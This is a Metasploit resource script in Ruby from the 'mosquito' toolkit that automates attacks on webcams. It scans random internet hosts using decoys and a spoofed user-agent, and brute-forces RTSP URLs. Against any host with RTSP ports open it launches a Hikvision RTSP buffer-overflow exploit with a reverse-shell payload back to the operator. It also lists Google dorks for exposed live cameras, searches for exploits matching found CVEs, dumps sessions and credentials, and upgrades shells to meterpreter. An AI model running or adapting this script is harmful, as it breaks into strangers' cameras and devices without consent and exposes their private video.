##
# Script: rtsp-url-brute.rc (webcam's)
# Author: r00t-3xp10it <pedroubuntu10[at]gmail.com>
# GitHub: https://github.com/r00t-3xp10it/resource_files
# -
# [OPTIONS]
# setg SAVE_DB true - Save workspace mosquito to database.xml
# setg LIMMIT 1000 - Limmit the number of random WAN hosts to search
# setg LHOST 192.168.1.71 - LHOST address to use in payload delivery
# setg RANDOM_HOSTS true - To instruct db_nmap to random search in WAN for hosts with ports open
# setg RHOSTS 201.203.27.251 149.169.88.244 212.224.231.230 159.121.101.207 To instruct db_nmap to scan hosts for ports open.
# -
# [SYNTAX EXAMPLES]
# msf5 > setg RANDOM_HOSTS true;resource /root/rtsp-url-brute.rc'
# msfconsole -q -x 'setg RANDOM_HOSTS true;resource /root/rtsp-url-brute.rc'
##
  <ruby>
      run_single("workspace -a mosquito")
      help = %Q|
                                                🦟__________       
              _______🦟________________________  ___(_) _  /______🦟
           __  __  __ \\  __ \\_  ___/  __  /  / / /_  /_  __/  __ \\
         🦟_  / / / / / /_/ /(__  )/ /_/ // /_/ /_  / / /_ / /_/ /
           /_/ /_/ /_/\\____//____/ \\__, / \\__,_/ /_/  \\__/ \\____/
                                  🦟 /_/                       🦟

    Script: rtsp-url-brute.rc
    Author: r00t-3xp10it <pedroubuntu10[at]gmail.com>
    GitHub: https://github.com/r00t-3xp10it/resource_files

      |
      print_line(help)
      Rex::sleep(1.5)

      ## Make sure we are connected to db
      unless framework.db.active
        File.delete("ip_range.txt") if File.exist?("ip_range.txt")
        print_error("[ERROR] Database not connected to postgresql.")
        Rex::sleep(2.0)
        err = %Q|

    Remark
    ------
    This resource script requires the msf database connected to postgresql.

    Connect DB To Postgresql
    ------------------------
    [execute] service postgresql start
    [execute] msfconsole -q -x 'resource rtsp-url-brute.rc'

        |
        print_line(err)
        print_error("please wait, cleaning recent configurations.")
        run_single("unsetg all")
        run_single("exit -y")
        return nil
      else
        print_good("Database connected to postgresql.")
        Rex::sleep(0.5)
        local = Dir.pwd
        work_name = framework.db.workspace.name
        print_status("Working in workspace: *#{work_name}")
        Rex::sleep(1.0)
        ip_range = File.read("ip_range.txt") if File.exist?("ip_range.txt")
      end

      ## Sellect the type of nmap scan to use
      if (framework.datastore['RANDOM_HOSTS'] == "true")
         if (framework.datastore['LIMMIT'] == nil or framework.datastore['LIMMIT'] == '')
           run_single("setg LIMMIT 300")
           print_line("RHOSTS => Random Search in WAN for:#{framework.datastore['LIMMIT']} alive hosts")
         else
           print_line("LIMMIT => #{framework.datastore['LIMMIT']}")
           print_line("RHOSTS => Random Search in WAN for:#{framework.datastore['LIMMIT']} alive hosts")
         end
      elsif (framework.datastore['RHOSTS'] == nil or framework.datastore['RHOSTS'] == '')
         run_single("setg RHOSTS #{ip_range}.0/24")
      elsif (framework.datastore['RHOSTS'])
         print_line("RHOSTS => #{framework.datastore['RHOSTS']}")
      end

      ## db_nmap WAN or RHOSTS or LOCAL_LAN scan settings
      # HINT: nmap will use a fake user-agent string (iPhone:Safari) while scanning.
      if (framework.datastore['RHOSTS'] == "#{ip_range}.0/24")
         run_single("db_nmap -sS -v -Pn -n -T4 -O -p 554,5554,8554,8080 --open --script=banner.nse,hnap-info.nse,rtsp-url-brute.nse,AXISwebcam-recon.nse --script-args http.useragent=\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" #{framework.datastore['RHOSTS']}")
      elsif (framework.datastore['RANDOM_HOSTS'] == "true")
         print_status("Nmap: search for random remote hosts with ports 554:5554:8554:50334 open")
         run_single("db_nmap -sS -vvv -Pn -n -T4 -iR #{framework.datastore['LIMMIT']} -p 554,5554,8554,50334 --open --script=banner.nse,hnap-info.nse,rtsp-url-brute.nse,AXISwebcam-recon.nse --script-args http.useragent=\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" -D 172.217.17.4,65.49.82.3")
      else
         run_single("db_nmap -sS -v -Pn -n -T4 -O -p 554,5554,8554,50334 --open --script=banner.nse,hnap-info.nse,rtsp-url-brute.nse,AXISwebcam-recon.nse --script-args http.useragent=\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\" -D 172.217.17.4,65.49.82.3 #{framework.datastore['RHOSTS']}")
      end

      if File.directory?("#{local}/logs")
         run_single("spool #{local}/logs/rtsp-url-brute.log")
      end
      print_line("")
      run_single("services")

      ## rhosts geolocation (geoip-bin)
      if (File.exist?("/usr/bin/geoiplookup"))
         print_line("Geo-Location")
         print_line("------------")
         ## Mapping database hosts (loop)
         framework.db.hosts.map(&:address).each do |sHost|
            geo_location = `geoiplookup #{sHost}|cut -d ':' -f2|tr -d '\n'`
            spl_range = sHost.split('.')
               ## Make sure we are NOT geolocating Internal ip(s)
               if (spl_range[0] == "192" and spl_range[1] == "168")
                  print_line("#{sHost} -  Not available (Internal IP Address)")
               else
                  print_line("#{sHost} - #{geo_location}")
               end
         end
      end

      print_line("")
      Rex::sleep(2.0)
      ## Read the database (metasploit)
      print_good("Sellecting target hosts from msf database.")
      xhost = framework.db.hosts.map(&:address).join(' ')
      xport = framework.db.services.map(&:port).join(' ')
      proto = framework.db.services.map(&:proto).join(' ')
      xname = framework.db.hosts.map(&:os_name).join(' ').gsub(' ',', ')
      run_single("setg RHOSTS #{xhost}")
      Rex::sleep(2.0)

         ## Make sure that exists hosts/ports (open) in database
         if xhost.nil? or xhost == '' or xhost == ' '
              File.delete("ip_range.txt") if File.exist?("ip_range.txt")
              print_error("[ERROR] db_nmap scan did not find any alive connections.")
              print_error("please wait, cleaning recent configurations.")
              Rex::sleep(1.0)
              run_single("unsetg all")
              run_single("workspace -d mosquito")
              return nil
         elsif xport.nil? or xport == '' or xport == ' '
              File.delete("ip_range.txt") if File.exist?("ip_range.txt")
              print_error("[ERROR] db_nmap did not find any 554,5554,8554 open ports.")
              print_error("please wait, cleaning recent configurations.")
              Rex::sleep(1.0)
              run_single("unsetg all")
              run_single("workspace -d mosquito")
              return nil
         end

      ## Make sure that freevulnseach.nse exists
      Rex::sleep(2.0)
      nse = "/usr/share/nmap/scripts/freevulnsearch.nse"
      unless (File.exist?(nse))
           print_error("[ERROR] freevulnsearch.nse/vulners.nse script(s) not found in nmap db.")
           print_error("[ERROR] Download nse script(s) and install it before running this rc file.")
           Rex::sleep(1.0)
           nof = %Q|

    How To Fix
    ----------
    Exit current session and msfconsole < exit AND exit -y >
    Then execute the follow commands in a new terminal windows:

    sudo wget https://raw.githubusercontent.com/OCSAF/freevulnsearch/master/freevulnsearch.nse
    sudo cp freevulnsearch.nse /usr/share/nmap/scripts/freevulnsearch.nse

    sudo wget https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/vulners.nse
    sudo cp vulners.nse /usr/share/nmap/scripts/vulners.nse
    sudo nmap --script-updatedb

           |
           print_line(nof)
           print_error("Please wait, cleaning recent configurations.")
           Rex::sleep(1.0)
           run_single("unsetg all")
           run_single("workspace -d mosquito")
           File.delete("ip_range.txt") if File.exist?("ip_range.txt")
           return nil
      else
           print_good("freevulnsearch.nse/vulners.nse script(s) found.")
      end


         ## Make sure we have LHOST option set
         if (framework.datastore['LHOST'] == nil or framework.datastore['LHOST'] == '')
         print_error("[ERROR] LHOST option not set.")
         Rex::sleep(2.0)
           err = %Q|

    Remark
    ------
    This resource script requires LHOST option set to be abble
    to send a payload to target hosts to spawn a session back.

    Set your local host (LHOST)
    ---------------------------
    [execute] setg LHOST 192.168.1.71
    [execute] resource rtsp-url-brute.rc

           |
           print_line(err)
           run_single("unset all")
           run_single("unsetg all")
           run_single("workspace -d mosquito")
           File.delete("ip_range.txt") if File.exist?("ip_range.txt")
           return nil
         else
            local_ip = "#{framework.datastore['LHOST']}"
         end

         ## Run gather/brute-force modules
         if xport =~ /(554|5554|8554)/ or proto =~ /(rtsp|rtsp-alt)/i
              print_warning("Remote Target port: 554:5554:8554 rtsp found")
              Rex::sleep(1.0)
              run_single("use exploit/linux/misc/hikvision_rtsp_bof")
              run_single("set PAYLOAD generic/shell_reverse_tcp")
              run_single("set LHOST #{local_ip}")
              run_single("set VERBOSE true")
              print_line("")
              run_single("services -c name -S rtsp -R")
              run_single("exploit")
              run_single("jobs -K")
         end

      ## Use google dorks to find webcams?
      print "[?] Google Dork search for webcams? (y/n):"
      web_cam = gets.chomp
      if web_cam == "y" or web_cam == "Y"
      print_good("Generating a List of Google Dorks ..")
      Rex::sleep(1.0)
      dorks = %Q|

    Option    Google Dork
    ------    -----------
    1         inurl:8080 "live view"
    2         inurl:8081 "live view"
    3         inurl:ViewerFrame?Mode=Motion
    4         inurl:MultiCameraFrame?Mode=Motion
    5         intitle:liveapplet
    6         intitle:"live webcam"
    7         intitle:"Network Camera NetworkCamera"
    8         intitle:"Live View / – AXIS"
    9         inurl:/view.shtml
    10        inurl:/view/index.shtml
    11        inurl:view/view.shtml beach
    12        inurl:view/view.shtml street
    13        inurl:appletvid.html
    14        inurl:CgiStart?page=Single
    15        intitle:EvoCam inurl:webcam.html
    16        inurl:indexFrame.shtml "Axis Video Server"

      |
      print_line(dorks)
      Rex::sleep(0.5)
      print "[Option]:"
         google_dork = gets.chomp

      ## Browser sellection (local PC) 
      check_browser = `which firefox`
      if (check_browser.empty? or check_browser.nil? or check_browser =='')
         print_warning("firefox not found, defaulting to: xdg-open")
         print_status("Referencies: https://www.lifewire.com/find-webcam-anywhere-in-world-3481869")
         trigger = "xdg-open"
         Rex::sleep(1.0)
      else
         print_good("firefox browser found: executing Google Dork")
         print_status("Referencies: https://www.lifewire.com/find-webcam-anywhere-in-world-3481869")
         trigger = "firefox"
         Rex::sleep(1.0)
      end

         ## Runing google dorks
         if google_dork == "1"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3A8080+%22live+view' > /dev/nul 2>&1")
         elsif google_dork == "2"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3A8081+%22live+view' > /dev/nul 2>&1")
         elsif google_dork == "3"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3AViewerFrame%3FMode%3DMotion' > /dev/nul 2>&1")
         elsif google_dork == "4"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3AMultiCameraFrame%3FMode%3DMotion' > /dev/nul 2>&1")
         elsif google_dork == "5"
run_single("#{trigger} 'https://www.google.com/search?q=intitle%3Aliveapplet' > /dev/nul 2>&1")
         elsif google_dork == "6"
run_single("#{trigger} 'https://www.google.com/search?q=intitle%3A%22live+webcam' > /dev/nul 2>&1")
         elsif google_dork == "7"
run_single("#{trigger} 'https://www.google.com/search?q=intitle%3A%22Network+Camera+NetworkCamera' > /dev/nul 2>&1")
         elsif google_dork == "8"
run_single("#{trigger} 'https://www.google.com/search?q=intitle%3A%22Live+View+%2F+%E2%80%93+AXIS' > /dev/nul 2>&1")
         elsif google_dork == "9"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3A%2Fview.shtml' > /dev/nul 2>&1")
         elsif google_dork == "10"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3A%2Fview%2Findex.shtml' > /dev/nul 2>&1")
         elsif google_dork == "11"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3Aview%2Fview.shtml+street' > /dev/nul 2>&1")
         elsif google_dork == "12"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3Aview%2Fview.shtml+beach' > /dev/nul 2>&1")
         elsif google_dork == "13"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3Aappletvid.html' > /dev/nul 2>&1")
         elsif google_dork == "14"
run_single("#{trigger} 'https://www.google.com/search?q=inurl%3ACgiStart%3Fpage%3DSingle' > /dev/nul 2>&1")
         elsif google_dork == "15"
run_single("#{trigger} 'https://www.google.com/search?q=intitle%3AEvoCam+inurl%3Awebcam.html' > /dev/nul 2>&1")
         elsif google_dork == "16"
run_single("#{trigger} 'https://www.google.nl/search?q=inurl:indexFrame.shtml+%22Axis+Video+Server' > /dev/nul 2>&1")
         else
             print_error("[ERROR] Abort: wrong option sellected: #{user_input}")
             Rex::sleep(1.5)
         end
      end

         Rex::sleep(1.0)
         ## Running freevulnsearch.nse (scan for CVE's)
         print "[?] Scan for possible CVE's? (y/n):"
            question = gets.chomp

         if question == "y" or question == "Y"
            print "[?] Use 'freevulnsearch.nse' or 'vulners.nse'? :"
            query_nse = gets.chomp
            if query_nse.nil? or query_nse == ''
                query_nse = "vulners.nse"
            end
            displ = %Q|

         MMMMMMMMMMM'""""'YMMM  MM""MMMMM""MM  MM""""""""`MMMMMMMMMM
         MMMMMMMMMM' .mmm. `MM  MM  MMMMM  MM  MM  mmmmmmmMMMMMMMMMM
         MMMMMMMMMM  MMMMMooMM  MM  MMMMP  MM  MM`      MMMMMMMMMMMM 
         MMMMMMMMMM  MMMMMMMMM  MM  MMMM' .MM  MM  MMMMMMMMMMMMMMMMM 
         MMMMMMMMMM. `MMM' .MM  MM  MMP' .MMM  MM  MMMMMMMMMMMMMMMMM 
         MMMMMMMMMMM.     .dMM  MM     .dMMMM  MM        .MMMMMMd@bM 
         MMMMMMMMMMMMMMMMMMMMM  MMMMMMMMMMMMM  MMMMMMMMMMMMMMMMMMMMM
                    freevulnsearch.nse by: Mathias Gut
                         vulners.nse by: gmedian

            |
            print_line(displ)
            print_good("[#{query_nse}] Running CVE checks againts: #{framework.datastore['RHOSTS']}")
            run_single("db_nmap -sV -v -T4 -Pn -n --script=#{query_nse} #{framework.datastore['RHOSTS']} --open -oN CVEs.txt")
            ## suggest exploits based on CVE number
            query_numb = `cat CVEs.txt|grep -m 20 'CVE-'|awk {'print $2'}|cut -d '-' -f1,2,3`
            # Make sure we get any CVE number back
            parse_trail = query_numb.split(' ')
            unless (parse_trail.empty? or parse_trail.nil? or parse_trail == '')
                print "[?] Suggest exploits to CVEs found ? (y/n):"
                query_cve = gets.chomp
                if query_cve == "y" or query_cve == "Y"
                    # Use msfconsole search core command to search for compatible exploits
                    print_line("")
                    print_good("searching in metasploit database for compatible exploits..")
                    Rex::sleep(1.0)
                    (parse_trail).each do |id|
                       print_status("search cve:#{id} type:exploit rank:good rank:great rank:excellent")
                       Rex::sleep(0.5)
                       run_single("search cve:#{id} type:exploit rank:good rank:great rank:excellent")
                       Rex::sleep(1.0)
                    end
                end
            else
                # None CVEs IDs found in nmap scans
                print_error("[NONE CVEs FOUND] Abort Suggest exploits module execution.")
                Rex::sleep(1.5)
            end
         end

      ## Make sure logs folder exists!
      if File.directory?("#{local}/logs")
         ## Save current database to local file (xml)
         if (framework.datastore['SAVE_DB'] == "true")
            rand = Rex::Text.rand_text_alpha(5)
            print_warning("Exporting database to: #{local}/logs/database_#{rand}.xml")
            run_single("db_export -f xml -a #{local}/logs/database_#{rand}.xml")
         end
      end

      print_line("")
      ## Display active sessions
      run_single("sessions -l")
      print_line("")
      run_single("creds")
      print_line("")
      ## Cleaning database and unset global variables
      print_warning("Cleaning global variables.")
      Rex::sleep(1.5)
      run_single("unsetg all")
      run_single("unset all")
      run_single("workspace -d mosquito")

      ## Upgrade command shell to meterpreter?
      if (framework.sessions.length > 0)
         print "[?] Upgrade command shell to meterpreter? (y/n):"
         upgrate_met = gets.chomp
         if upgrate_met == "y" or upgrate_met == "Y"
         run_single("use post/multi/manage/shell_to_meterpreter")
            # Loop truth sessions to grab the session ID
            framework.sessions.each_key do |sid|
               run_single("set SESSION #{sid}")
               run_single("run")
            end
            print_line("")
            run_single("sessions -l")
            print_line("")
         end
      end

      dtr = `date`
      ## Writting ['xhost(s)'] to mosquito logfile
      if File.directory?("#{local}/logs")
         print_status("Logfile stored under: #{local}/logs/rtsp-url-brute.log")
         run_single("echo \"[#{dtr}] rtsp-url-brute: #{xhost}\" >> logs/mosquito.log")
      end

      File.delete("CVEs.txt") if File.exist?("CVEs.txt")
      File.delete("ip_range.txt") if File.exist?("ip_range.txt")
      run_single("back")
   </ruby>
